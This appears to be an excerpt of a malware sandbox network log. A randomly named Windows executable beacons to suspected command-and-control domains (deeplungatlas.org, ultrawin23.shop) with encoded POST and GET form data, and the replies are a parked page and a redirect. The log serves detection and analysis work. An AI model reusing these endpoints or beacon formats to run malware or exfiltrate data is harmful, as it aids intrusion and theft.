                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:31 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: PHP/8.1.29
                                                                                                                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                                                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:31.750207901 CET1236INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                                                                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
                                                                                                                                  Nov 7, 2024 12:53:31.750221968 CET424INData Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e
                                                                                                                                  Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
                                                                                                                                  Nov 7, 2024 12:53:31.750233889 CET1236INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 69 76 69 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 0a 09 09 09 3c 68 32 3e 52 65 67 69 73 74 65 72 20 64 6f 6d 61 69 6e 73 20 61 74 20 4c 6f 6f 70 69 61 3c
                                                                                                                                  Data Ascii: <div class="divider"></div><h2>Register domains at Loopia</h2><p>Protect your company name, brands and ideas as domains at one of the largest domain providers in Scandinavia. <a href="https://www.loopia.com/domainna
                                                                                                                                  Nov 7, 2024 12:53:31.750252008 CET1236INData Raw: 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 64 6e 73 22 3e 52 65 61 64 20 6d 6f 72 65 20 61 74 20 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 6f 70 69 61 64 6e 73 20 c2 bb 3c 2f 61 3e 3c 2f 70 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69
                                                                                                                                  Data Ascii: web&utm_content=dns">Read more at loopia.com/loopiadns </a></p> <div class="divider"></div><h2>Create a website at Loopia - quickly and easily</h2><p>Our full-featured web hosting packages include everything you need
                                                                                                                                  Nov 7, 2024 12:53:31.750273943 CET454INData Raw: 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 73 65 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67
                                                                                                                                  Data Ascii: ><a href="https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb"><img src="https://static.loopia.se/shared/logo/logo-loopia-white.svg" alt="Loopia AB" id="logo" /></a><br /><p><a href="https:/


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.449917194.9.94.85804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:33.459759951 CET10711OUTPOST /57zf/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.deeplungatlas.org
                                                                                                                                  Origin: http://www.deeplungatlas.org
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 10305
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.deeplungatlas.org/57zf/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 63 51 2f 6a 73 52 74 67 74 78 77 67 48 34 70 6b 41 66 52 55 59 47 4c 71 72 31 64 5a 69 7a 31 45 59 4f 32 6d 74 6f 66 6a 61 57 33 4f 57 4d 39 37 30 71 59 73 4f 31 54 75 63 49 6d 43 4d 71 2b 73 6c 46 4f 4c 6a 51 67 4e 58 32 46 66 57 71 5a 76 79 32 69 50 37 49 61 4c 64 4f 76 66 4c 6e 73 33 66 4b 34 55 43 51 70 76 77 4a 76 54 77 77 75 4d 44 43 77 54 30 47 4e 38 49 59 4e 7a 4f 67 44 34 62 36 48 53 38 6b 6c 41 6e 6d 35 4c 4d 46 4c 73 64 45 70 77 6a 4e 75 54 57 67 33 6b 6a 48 4a 33 4f 55 44 33 64 53 44 34 72 70 54 67 67 44 34 67 76 4f 47 6a 57 77 44 77 4a 45 34 54 77 6b 43 44 6d 53 79 38 70 7a 79 57 31 71 56 48 76 4d 58 68 30 59 4d 4a 4e 35 77 55 47 67 76 30 59 71 70 2f 31 78 42 68 6d 53 4d 53 30 44 65 66 31 52 58 78 6e 48 73 4a 65 58 74 46 78 48 6e 70 70 39 57 71 5a 4c 69 39 77 6c 34 59 6c 48 62 41 72 59 75 7a 4f 66 30 31 30 43 32 34 67 77 53 7a 6c 72 4c 68 67 61 5a 4d 31 66 52 36 2b 30 55 48 73 6c 5a 43 6d 4e 36 36 54 64 68 61 4f 7a 34 74 66 72 48 65 42 71 59 32 75 38 5a 77 2b [TRUNCATED]
                                                                                                                                  Data Ascii: NBfdCRyH=cQ/jsRtgtxwgH4pkAfRUYGLqr1dZiz1EYO2mtofjaW3OWM970qYsO1TucImCMq+slFOLjQgNX2FfWqZvy2iP7IaLdOvfLns3fK4UCQpvwJvTwwuMDCwT0GN8IYNzOgD4b6HS8klAnm5LMFLsdEpwjNuTWg3kjHJ3OUD3dSD4rpTggD4gvOGjWwDwJE4TwkCDmSy8pzyW1qVHvMXh0YMJN5wUGgv0Yqp/1xBhmSMS0Def1RXxnHsJeXtFxHnpp9WqZLi9wl4YlHbArYuzOf010C24gwSzlrLhgaZM1fR6+0UHslZCmN66TdhaOz4tfrHeBqY2u8Zw+9fyxiBtYgItfShXpdvDKEtYA7pc2KG9E9hjTNWoe66np2jSSRU4sn9t0bnuR409KSm2TlkzCl4+jLHkGLXE60+B3vMZh1sJTSH5eR+qWmUBYJVuYvPvF3PZf6YFDIcymb94aPG/07+9AoO67DGPc481hI+LI+3ljnhpgEyGY45rJVdonhADFYqIVhwPdFiJADo/UimrGUv2M1FLJvFmWjeuJRdpba7ngGHO4FS3Eqk8zEyRLXsGj2QmDY3L0mDFD9UhblSKr73BrGwiH4qmacdHPSvaUx1WGVIZgShB2cCbP3I0FsNWWlhn3KmhGhujSv9ojhZndGkI19MW3/Qeti255+D8RJi7HRtMsBBmEEuD1Bx2FHXBVWieMCbvFAL7rlAQERe3rnyl1wMg0hRfIulZn9nonuOAviaUZecD/vIne2awC+7nHTvzVbaiO0+QSnhO3tf7OIITXDYN8vaxK+OZRfMG6a6HgXfUZ4WpXrVfXX3ejfsQHcy+wwxX+PkVD3Frdm2oEmHTRIoTPF7dMKVg/fXVv3i3/GV34zBOZJ+CR2nTd2BnL2A1eLfZIsSahqMN7l5b2K/GE8Csx68hLLNmmZWNUQXr7zWhJ3p2AIwCAgZNl3m+eW6VbvvjxLIwFIiTrpoc4pXpiNMVUC/PKWQKBulSuNbC5Ma [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:34.461174965 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:34 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: PHP/8.1.29
                                                                                                                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                                                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:34.461189985 CET212INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                                                                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                                                                                                  Nov 7, 2024 12:53:34.461204052 CET1236INData Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65
                                                                                                                                  Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                                                                                                  Nov 7, 2024 12:53:34.461215973 CET1236INData Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73
                                                                                                                                  Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                                                                                                  Nov 7, 2024 12:53:34.461226940 CET1236INData Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70
                                                                                                                                  Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                                                                                                  Nov 7, 2024 12:53:34.461277008 CET666INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                                                                  Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                                                                  Nov 7, 2024 12:53:34.461313963 CET666INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                                                                  Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.449933194.9.94.85804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:36.002794981 CET339OUTGET /57zf/?NBfdCRyH=RSXDvmZ18TUSGah6EulyS1XswkRToS9Pe8zesMLeYybHc+55raQPDCyvNJ+XALungzCzmhokbhdOc6Bo/lmi/NXFftLLf3QUCIw7GC9Ov73YwEGOSCVy7Hg=&ZpEH9=TjSP5LXXbN8d4 HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Host: www.deeplungatlas.org
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Nov 7, 2024 12:53:36.833479881 CET1236INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Thu, 07 Nov 2024 11:53:36 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  X-Powered-By: PHP/8.1.29
                                                                                                                                  Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                                                                  Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                                                                  Nov 7, 2024 12:53:36.833610058 CET212INData Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20
                                                                                                                                  Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="init
                                                                                                                                  Nov 7, 2024 12:53:36.833621025 CET1236INData Raw: 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 20 3d 20 31 2e 30 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65
                                                                                                                                  Data Ascii: ial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/responsive/styles/reset.css" /> <link rel="stylesheet" type="text/css" href="https://static.loopia.se/s
                                                                                                                                  Nov 7, 2024 12:53:36.833668947 CET1236INData Raw: 20 73 74 61 72 74 65 64 3f 20 4c 6f 67 69 6e 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 6c 6f 67 69 6e 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73
                                                                                                                                  Data Ascii: started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=login">Loopia Customer zone</a> and actualize your plan.</p> <div class="div
                                                                                                                                  Nov 7, 2024 12:53:36.833678961 CET1236INData Raw: 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 6d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 69 6e 20 6f 6e 65 20 73 69 6e 67 6c 65 20 70 6c 61 63 65 20 69 6e 20 4c 6f 6f 70
                                                                                                                                  Data Ascii: ith LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=dns">Read more
                                                                                                                                  Nov 7, 2024 12:53:36.833692074 CET666INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                                                                  Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.449963170.39.213.43804480C:\Program Files (x86)\IwGxFoisffkcqmQYcsyIPwYRroJgEfIvnEQtqHxJaLarYfURmiqcLEUVLsiyDbkztcSFIJigaMhkWQd\wPGxKDFwovcH.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Nov 7, 2024 12:53:42.334391117 CET603OUTPOST /53y2/ HTTP/1.1
                                                                                                                                  Accept: */*
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Host: www.ultrawin23.shop
                                                                                                                                  Origin: http://www.ultrawin23.shop
                                                                                                                                  Cache-Control: no-cache
                                                                                                                                  Connection: close
                                                                                                                                  Content-Length: 205
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Referer: http://www.ultrawin23.shop/53y2/
                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; yie9; rv:11.0) like Gecko
                                                                                                                                  Data Raw: 4e 42 66 64 43 52 79 48 3d 67 39 68 79 30 71 79 32 66 52 52 74 46 2b 48 39 69 4f 63 54 30 78 64 59 74 35 74 6a 6c 5a 5a 42 31 4e 30 4d 63 52 62 37 6b 55 62 33 71 55 32 61 73 7a 34 63 6f 39 47 41 38 63 54 53 39 45 34 62 67 48 59 66 52 73 52 4b 54 30 52 68 6d 39 73 48 70 5a 79 79 67 68 52 65 61 53 53 43 4f 62 71 77 46 33 43 36 31 36 61 4e 55 4d 73 67 73 71 69 43 65 52 48 6c 66 46 4e 78 74 2f 79 4f 51 7a 30 34 48 39 58 73 6e 31 50 69 66 52 68 2b 51 4e 72 53 42 37 74 4e 71 4e 42 59 4e 55 44 43 66 78 33 7a 4d 67 55 6d 77 33 42 6c 48 57 33 65 73 62 58 52 38 46 59 58 73 35 32 61 76 44 64 47 58 6f 62 5a 66 77 3d 3d
                                                                                                                                  Data Ascii: NBfdCRyH=g9hy0qy2fRRtF+H9iOcT0xdYt5tjlZZB1N0McRb7kUb3qU2asz4co9GA8cTS9E4bgHYfRsRKT0Rhm9sHpZyyghReaSSCObqwF3C616aNUMsgsqiCeRHlfFNxt/yOQz04H9Xsn1PifRh+QNrSB7tNqNBYNUDCfx3zMgUmw3BlHW3esbXR8FYXs52avDdGXobZfw==
                                                                                                                                  Nov 7, 2024 12:53:42.925740957 CET907INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Connection: close
                                                                                                                                  content-type: text/html
                                                                                                                                  content-length: 707
                                                                                                                                  date: Thu, 07 Nov 2024 11:53:42 GMT
                                                                                                                                  server: LiteSpeed
                                                                                                                                  location: https://www.ultrawin23.shop/53y2/
